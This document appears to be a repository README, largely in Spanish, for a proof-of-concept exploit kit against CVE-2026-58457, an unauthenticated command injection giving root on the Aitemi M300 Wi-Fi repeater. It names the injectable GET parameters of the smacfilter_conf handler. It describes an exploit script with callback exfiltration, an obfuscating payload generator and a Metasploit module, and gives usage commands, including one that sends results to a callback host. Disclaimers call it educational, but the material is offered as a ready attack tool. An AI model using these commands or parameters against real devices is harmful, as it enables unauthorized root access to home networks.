
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] Este código se proporciona tal cual, únicamente con fines educativos y de investigación. No utilice este PoC en sistemas de producción, entornos compartidos ni en objetivos no autorizados.
- Ejecutar o alojar este código puede provocar detecciones de antivirus, alertas de monitoreo de seguridad o consecuencias legales si se usa indebidamente.
- Los autores y mantenedores del repositorio no asumen ninguna responsabilidad por daños, uso indebido o actividad ilegal derivados de este código.
- Úselo exclusivamente en entornos de laboratorio aislados con la autorización adecuada. Destinado únicamente a investigación defensiva, análisis de vulnerabilidades y pruebas de blue team.
Existe una vulnerabilidad de inyección de comandos del sistema operativo no autenticada en el manejador smacfilter_conf. Los parámetros GET name, enable y mac se pasan sin sanear a una llamada sprintf() que construye comandos UCI ejecutados como root.
poc.py - Exploit completo con soporte HTTPS, reintentos, tiempo de espera y exfiltración mediante callback.val.py - Validador de vulnerabilidades pasivo y seguro (usa el comando id, inofensivo).gen.py - Generador avanzado de payloads con múltiples técnicas de ofuscación.MITIGATIONS.md - Medidas defensivas recomendadas.exploit/.pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
Las estrellas y contribuciones son bienvenidas - especialmente mejoras para bypasses o variantes adicionales de firmware.